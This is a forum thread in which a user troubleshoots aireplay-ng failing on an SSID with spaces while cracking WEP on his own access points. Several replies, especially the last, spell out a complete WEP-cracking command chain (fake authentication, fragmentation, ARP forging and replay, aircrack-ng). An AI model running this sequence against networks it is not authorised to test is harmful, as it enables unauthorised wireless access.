Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: Error When using aireplay-ng when SSID has spaces in its name

  1. #1
    Junior Member Pyros's Avatar
    Join Date
    Aug 2006
    Posts
    25

    Unhappy Error When using aireplay-ng when SSID has spaces in its name

    Hi Guys

    I am getting a error when using aireplay-ng

    I am using a sony vaio, BT3 live cd and a 8470 WD card.

    I have cracked the wep on my AP downstairs without to much fuss, but I cannot crack my other AP that I have in my sons back room.

    I have called the AP Charlies Vigor 2600 ( as Charlie is my sons name and the AP is a vigor 2600 ! )

    Here are the commands I am using untill I get teh error

    airmon-ng stop ath0
    airmon-ng start wifi0
    airodump-ng ath0

    Then I use

    aireplay-ng -1 0 -e Charlies Vigor 2600 -a 00:0C:76:C8:FD:C5 -h 00:20:A6:58:28:4B ath0

    and it responds with
    "aireplay-ng --help" for help.
    bt ~ #

    I have looked using help but I did not find the info I think I need.
    So I thought it was the spaces in the SSID so I tried " " and also tried ' '

    This also gave the following error

    bt ~ # aireplay-ng -1 0 -e 'Charlies Vigor 2600' -a 00:0C:76:C8:FD:C5 -h 00:20:A 6:58:28:4B ath0
    09:59:27 Waiting for beacon frame (BSSID: 00:0C:76:C8:FD:C5) on channel 10
    09:59:37 No such BSSID available.
    6:58:28:4B ath0-ng -1 0 -e "Charlies Vigor 2600" -a 00:0C:76:C8:FD:C5 -h 00:20:A
    10:00:14 Waiting for beacon frame (BSSID: 00:0C:76:C8:FD:C5) on channel 10
    10:00:24 No such BSSID available.
    58:28:4B ath0ay-ng -1 0 -e Charlies Vigor 2600 -a 00:0C:76:C8:FD:C5 -h 00:20:A6:
    "aireplay-ng --help" for help.
    bt ~ #

    As you can see I have tried to find out the problem and tried to get round the problem but with no luck.

    Have you any ideas how I overcome this problem.

    Cheers
    Pyros
    Stay legal ...
    Pyro

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    bt ~ # aireplay-ng -1 0 -e "Charlies Vigor 2600" -a 00:0C:76:C8:FD:C5 -h 00:20:A 6:58:28:4B ath0


    You need quotes """""""""""""""""

  3. #3

    Default

    Quote Originally Posted by pureh@te View Post
    bt ~ # aireplay-ng -1 0 -e "Charlies Vigor 2600" -a 00:0C:76:C8:FD:C5 -h 00:20:A 6:58:28:4B ath0


    You need quotes """""""""""""""""
    You might also want to add your channel when you dump BEFORE you use aireplay-ng

    example

    airodump-ng -c (what ever your channel) -w wepdump --bssid 00:0C:76:C8:FD:C5 ath0 & then run

    aireplay-ng -1 0 -e "Charlies Vigor 2600" -a 00:0C:76:C8:FD:C5 -h 00:20:A6:58:28:4B ath0

    or just change the charlies vigor 2600 to charliesvigor2600 NO SPACES

  4. #4
    Junior Member Pyros's Avatar
    Join Date
    Aug 2006
    Posts
    25

    Default

    Quote Originally Posted by pureh@te View Post
    bt ~ # aireplay-ng -1 0 -e "Charlies Vigor 2600" -a 00:0C:76:C8:FD:C5 -h 00:20:A 6:58:28:4B ath0


    You need quotes """""""""""""""""
    Hi Pureh@te

    Thank you for your valuable comments, I have tried with the "" but it comes back as

    6:58:28:4B ath0-ng -1 0 -e "Charlies Vigor 2600" -a 00:0C:76:C8:FD:C5 -h 00:20:A
    10:00:14 Waiting for beacon frame (BSSID: 00:0C:76:C8:FD:C5) on channel 10
    10:00:24 No such BSSID available.

    So I thought I will try ''

    this time i get

    bt ~ # aireplay-ng -1 0 -e 'Charlies Vigor 2600' -a 00:0C:76:C8:FD:C5 -h 00:20:A 6:58:28:4B ath0
    09:59:27 Waiting for beacon frame (BSSID: 00:0C:76:C8:FD:C5) on channel 10
    09:59:37 No such BSSID available.

    What a pain !

    Any more ideas?
    Cheers
    Pyros
    Stay legal ...
    Pyro

  5. #5
    Junior Member Pyros's Avatar
    Join Date
    Aug 2006
    Posts
    25

    Default

    Quote Originally Posted by samsung View Post
    You might also want to add your channel when you dump BEFORE you use aireplay-ng

    example

    airodump-ng -c (what ever your channel) -w wepdump --bssid 00:0C:76:C8:FD:C5 ath0 & then run

    aireplay-ng -1 0 -e "Charlies Vigor 2600" -a 00:0C:76:C8:FD:C5 -h 00:20:A6:58:28:4B ath0

    or just change the charlies vigor 2600 to charliesvigor2600 NO SPACES
    Hi Samsung

    Thank you for your valuable comments, I have changed the SSID to charliesvigor2600 and everything worked ok, so I changed it back and got the same problem.

    While I can change my SSID here, how would i go about pen testing a clients wireless set up if indeed there SSID contained spaces ? as it would not look very profesional if I asked the client to change his SSID, I will continue looking on Google and forums to see why this is happening.

    cheers
    Stay legal ...
    Pyro

  6. #6
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Did you lock airodump on the channel like samsug suggested? It looks like its looking on channel 10? is that what channel your AP is on?

  7. #7
    Junior Member Pyros's Avatar
    Join Date
    Aug 2006
    Posts
    25

    Default

    Quote Originally Posted by pureh@te View Post
    Did you lock airodump on the channel like samsug suggested? It looks like its looking on channel 10? is that what channel your AP is on?
    Hi Pureh@te

    No sorry I did not try that as I was in to much of a hurry to try the new SSID without spaces, SORRY !
    My previous code worked when the spaces are not present, but I will try the code that samsung has provided.

    Once again thanks for your input
    cheers
    Stay legal ...
    Pyro

  8. #8

    Default

    Quote Originally Posted by Pyros View Post
    Hi Pureh@te

    No sorry I did not try that as I was in to much of a hurry to try the new SSID without spaces, SORRY !
    My previous code worked when the spaces are not present, but I will try the code that samsung has provided.

    Once again thanks for your input
    cheers
    Good to hear it's getting further, you need to specify what channel you want other wise it will keep trying every channel & it just won't work

  9. #9
    Senior Member PrairieFire's Avatar
    Join Date
    Apr 2007
    Posts
    705

    Default

    Aircrack-ng Suite Documentation clearly states how to handle ssid with spaces.
    Μολὼν λαβέ - Great spirits encounter heavy opposition from mediocre minds.

  10. #10
    Junior Member dapirates1's Avatar
    Join Date
    Nov 2007
    Posts
    88

    Default

    Hello pyros I would be trying this as i have exactly the same card assuming these details are right

    Your mac = 00:20:A6:58:28:4B
    Bssid = 00:0C:76:C8:FD:C5
    Essid = Charlies Vigor 2600

    airmon-ng stop ath0
    airmon-ng start wifi0 ? (?=channel number of the AP i belive yours is 6)

    then assosiate with

    aireplay-ng -1 0 -e "Charlies Vigor 2600" -a 00:0C:76:C8:FD:C5 -h 00:20:A6:58:28:4B ath0

    or

    aireplay-ng -1 0 -e 'Charlies Vigor 2600' -a 00:0C:76:C8:FD:C5 -h 00:20:A6:58:28:4B ath0



    aireplay-ng -5 -b 00:0C:76:C8:FD:C5 -h 00:20:A6:58:28:4B ath0


    packetforge-ng -0 -a 00:0C:76:C8:FD:C5 -h 00:20:A6:58:28:4B -k 255.255.255.255 -l 255.255.255.255.255 -y whateveryourfragmentiscalled.xor -w arp-request

    airodump-ng -c 6 --bssid 00:0C:76:C8:FD:C5 -w wep ath0

    aireplay-ng -2 -r arp-request ath0

    aircrack-ng -P 2 -b 00:0C:76:C8:FD:C5 wep*.cap


    Sometimes i have problems with the same card as you with ath0 in that case i would do everything the same but use ath1 instead by changing the first commands to just

    airmon-ng start wifi0 ? (?=channel number of the AP i belive yours is 6)

    I will set my AP to the same name and channel now and try it for you see if i get problems.
    My life is a living Hell, Day by Day fixing broken Windows Boxes (will it ever end)

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •